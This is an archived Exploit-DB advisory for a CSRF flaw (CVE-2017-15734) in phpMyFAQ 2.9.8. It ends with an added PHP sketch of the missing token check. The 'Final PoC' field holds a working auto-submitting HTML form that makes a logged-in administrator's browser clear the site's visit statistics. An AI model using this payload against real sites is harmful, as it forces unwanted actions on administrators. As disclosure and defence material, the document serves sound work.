
[webapps] phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)

Exploit DB Archived Mar 16, 2026 ✓ Full text saved



    EDB-ID: 52459
    CVE: 2017-15734
    Author: CODESECLAB
    Type: WEBAPPS
    Platform: PHP
    Date: 2025-12-03

    # Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
    # Date: 2024-10-26
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/thorsten/phpMyFAQ
    # Software Link: https://github.com/thorsten/phpMyFAQ
    # Version: 2.9.8
    # Tested on: Ubuntu Windows
    # CVE : CVE-2017-15734

    PoC:
    Get http://phpmyfaq/admin/index.php?action=clear-visits

    Reproduction:
    While still logged in, open another browser window to access the link.

    Some Details:
    {
        "Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
        "File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
        "Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
        "Request Parameters": "action=clear-visits",
        "Request Method": "GET",
        "Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
        "Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
    }

    [Replace Your Domain Name]
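
The control that "Protection Mechanisms Before Patch" reports as missing, sketched as an added example (not phpMyFAQ's code and not its actual patch): a state-changing admin action is refused unless it arrives as POST carrying the per-session token. The function names, the `csrf` field name and the `csrf_token` session key are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration with hypothetical helper names; not phpMyFAQ's code or patch.
// In a web request, pass $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION.

// Issue (or reuse) the per-session token that the admin form embeds as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing admin action may run.
// Returns an HTTP status: 200 = proceed, 405 = wrong method, 403 = missing/bad token.
function authorize_state_change(string $method, array $post, array $session): int
{
    // A state change must not be reachable via GET: links, image tags and
    // auto-submitting GET forms all send GET with the admin's session cookie.
    if (strtoupper($method) !== 'POST') {
        return 405;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf'] ?? '';
    // Reject absent or non-string values, then compare in constant time.
    if (!is_string($expected) || $expected === '' || !is_string($supplied)) {
        return 403;
    }
    return hash_equals($expected, $supplied) ? 200 : 403;
}

// Constructed requests (not captured traffic) against action=clear-visits.
$session = [];
$token   = csrf_token($session);

$cases = [
    'GET without token (PoC shape)' => ['GET',  []],
    'POST without token'            => ['POST', []],
    'POST with wrong token'         => ['POST', ['csrf' => str_repeat('0', 64)]],
    'POST with session token'       => ['POST', ['csrf' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-30s -> %d\n", $label, authorize_state_change($method, $post, $session));
}
```

Only the last constructed request is allowed through; the GET shape from the advisory is rejected before the token is even inspected.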